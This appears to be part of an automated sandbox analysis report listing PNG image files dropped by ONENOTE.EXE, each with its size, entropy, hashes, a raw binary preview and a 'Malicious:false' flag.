                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1657
                                                                                                        Entropy (8bit):7.80882577056055
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                        MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                        SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                        SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                        SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):2210
                                                                                                        Entropy (8bit):7.86853667196985
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                        MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                        SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                        SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                        SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14458
                                                                                                        Entropy (8bit):7.944094738048628
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                        MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                        SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                        SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                        SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):13030
                                                                                                        Entropy (8bit):7.948664903731204
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                        MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                        SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                        SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                        SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):3879
                                                                                                        Entropy (8bit):7.9281351307465044
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
                                                                                                        MD5:C451B2A146BDD7EF33AB3EA27268796D
                                                                                                        SHA1:C040BA2F31342CBCBF597C96D4D6EDB83D473B77
                                                                                                        SHA-256:4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
                                                                                                        SHA-512:55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..*U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....|;..gy+.[..,...o...p..2.%..B.Y....|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+**.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..|.l{..72.....zv@.#.<.........../....F|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):19235
                                                                                                        Entropy (8bit):7.944867159042578
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                        MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                        SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                        SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                        SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):7374
                                                                                                        Entropy (8bit):7.955141875077912
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                        MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                        SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                        SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                        SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1604
                                                                                                        Entropy (8bit):7.814570704154439
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                        MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                        SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                        SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                        SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):5386
                                                                                                        Entropy (8bit):7.943706538857394
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                        MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                        SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                        SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                        SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):4181
                                                                                                        Entropy (8bit):7.950380155401321
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                        MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                        SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                        SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                        SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):14553
                                                                                                        Entropy (8bit):7.951135681293377
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                        MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                        SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                        SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                        SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8184
                                                                                                        Entropy (8bit):7.807848176906598
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                        MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                        SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                        SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                        SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1924
                                                                                                        Entropy (8bit):7.836744258175623
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                        MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                        SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                        SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                        SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                        Malicious:false
                                                                                                        Preview:.PNG........IHDR.......U.....Q.6.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].O.W....G.lT^M*..J.....".4*....j..H..R^.".m..5....&..j..B..`.`..>...X......]z.[&.>..ef..gB.d...s~.=...3....m..(E...~.[....... .. .E3..7.4.......}..H._.D.,j.)..q\.....7..#.ag.o|.?.......;C|.#.../v.H.......o~.{G......H.|..;..v...G.._...p1d2..&......QS4<..i.".X.....1(..GR.R#.}.!.E<..:LLM......s..:"......Fa...b.....\.T..~OD... ..:j.~..p=Y...Y......?.Y.A...0!6_p.dKctjvZ....\.........V..1)..:.....;7:...(.[...7.....u..'ra.....S.]..........7.#,[..<.l.....[.........90d[.2a.R.........E.CJ..C..S..*._...$^...Q..:>hx.k7.`jN:.W.X..N..p..K..."...q....a.Uy.......[d.:vmkk./cW.>.K..C..?\d...'.@s_.?&.....V .?F..;k.....%+....+.3bk......f....T....S.(2.=...?gQ...K.._,.#....?.1W.......m2.....Z...-..:..?.#J......KS.P|&[<..........Dd.....\.....W$z].k..-..8...>..Q`Yz.}w&..._......?.)_[T...:wy...O8.Om......l.....\....]..."f...........q.o.V>~s...-....N{.n....w..O|.D...
                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                        File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                        Category:dropped
                                                                                                        Size (bytes):11886
                                                                                                        Entropy (8bit):7.946442244439929
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                        MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                        SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                        SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                        SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                        Malicious:false
